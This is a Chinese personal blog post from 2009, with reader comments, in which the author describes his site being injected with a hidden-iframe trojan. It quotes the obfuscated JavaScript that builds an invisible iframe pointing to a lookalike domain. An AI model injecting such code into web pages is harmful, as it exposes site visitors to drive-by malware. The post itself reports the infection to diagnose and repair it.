空间被大面积挂马。
July/9th 2009
最近莫名其妙的博客打不开,一查,发现用作跳转的index.php被加了东西。是一个iframe的马。那段php代码还有错误,汗~~所以造成无法跳转。后来经过调查,发现这个马的一些特征:
一般感染只感染 index.php , main.php, login.php, index.html。 核心代码类似: <script>document.write("<"+'if'+''+'ra'+''+"me"+' sr'+"c=\"ht"+'t'+"p:"+''+"/"+''+'/mic'+"roso"+"tf"+''+'.c'+''+"n"+'/'+"\" wid"+''+"th=1 h"+"eigh"+''+'t'+"="+"2></i"+''+"fr"+"a"+''+""+''+"me"+'>');</script><script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>
可以看到iframe的页面指向 microsotf.cn (不用惊恐,不是microsoft~~)。Google这个网页,发现这个网页是俄罗斯的。报告有2个病毒。现在已经无法访问了。 现在一时也查不到中招的原因。只有写个脚本修复被修改的文件吧。。。

2980 read 20 comment(s)
#1
糖粒子   2009年07月09号 15:28       回复
瑞星叽歪:奇虎网页被植入木马
奇虎反驳:瑞星不懂技术
#2
Longbill   2009年07月09号 17:06       回复
回复 糖粒子: 
呃。。瑞星是流氓软件。。我的电脑一直保持裸奔状态。。
#3
糖粒子   2009年07月10号 09:06       回复
回复 Longbill: 
你用mac,当然可以裸奔。我从有了自己的电脑起就一直用的是eset。个人感觉eset的nod32与瑞星是两个截然不同的风格,nod32超安静,颇有大侠的风范,而瑞星则是芙蓉姐姐,身体巨大且还爱炫耀。

如今,瑞星快不行了,叫都没有力气了……
#4
双色球   2009年07月13号 17:17       回复
软件啊 总是两面性 比其他的更有危险性
#5
Evance   2009年07月14号 00:45       回复
服务器中毒的?
#6
longbill   2009年07月14号 02:21       回复
回复 Evance: 
应该不是,可能是谁上传了恶意脚本。
#7
cheen.cn   2009年07月16号 12:29       回复
我有复出~·
唉。。想和你一起使用服务器,不知道安全部安全。。。
无论是对你还是对我
#8
longbill   2009年07月16号 15:24       回复
回复 cheen.cn: 
服务器是linux操作系统,这次挂马应该是有个php的脚本出了问题。几乎不会是系统的问题。
#9
cheen.cn   2009年07月17号 01:23       回复
不知道你的空间还租不租了?
#10
豆芽   2009年07月17号 02:19       回复
我一直在想 被挂马 是怎么一个过程?攻击对象是服务器?那是攻击还是通过网页漏洞呢?
#11
华晨   2009年07月17号 15:21       回复
回复 Longbill: 
裸奔?你就不怕密码被盗?
#12
Longbill   2009年07月18号 00:45       回复
回复 cheen.cn: 
可以啊。想要的话我们私下谈。
#13
Longbill   2009年07月18号 00:46       回复
回复 豆芽: 
我估计是网页漏洞。服务器是linux操作系统,而且有专人维护,几乎不会出问题。
#14
Longbill   2009年07月18号 00:47       回复
回复 华晨: 
又没有病毒,密码怎么可能被盗。。。。
#15
cheen.cn   2009年07月18号 01:33       回复
回复 Longbill: 
好呀~~
我的域名是在SUDU.CN申请的,能转到国外吗?
听说前一段时间国内的域名经常不能访问。
#16
Longbill   2009年07月18号 03:19       回复
回复 cheen.cn: 
域名能不能转我不知道,至少比较麻烦吧。。
#17
zuixinyule   2009年08月02号 08:47       回复
你的站被挂说明你的站是个牛站

小网站人家不值得挂

恭喜啊
#18
华晨   2009年08月21号 14:26       回复
不是吧,好端端的怎么被挂马了呢?一定要查出原因来呀!
#19
福彩双色球   2009年10月14号 11:04       回复
不错啊。。。。。
#20
福安   2009年10月15号 12:08       回复
我还没碰到这种事,可能我的网站、博客都不够级别
希望cmstop安全度高点
添加新的评论
称呼:*
邮件:*
网站:
内容:

Copyright © Longbill 2008-2025 , Designed by EndTo , Powered by EndCMS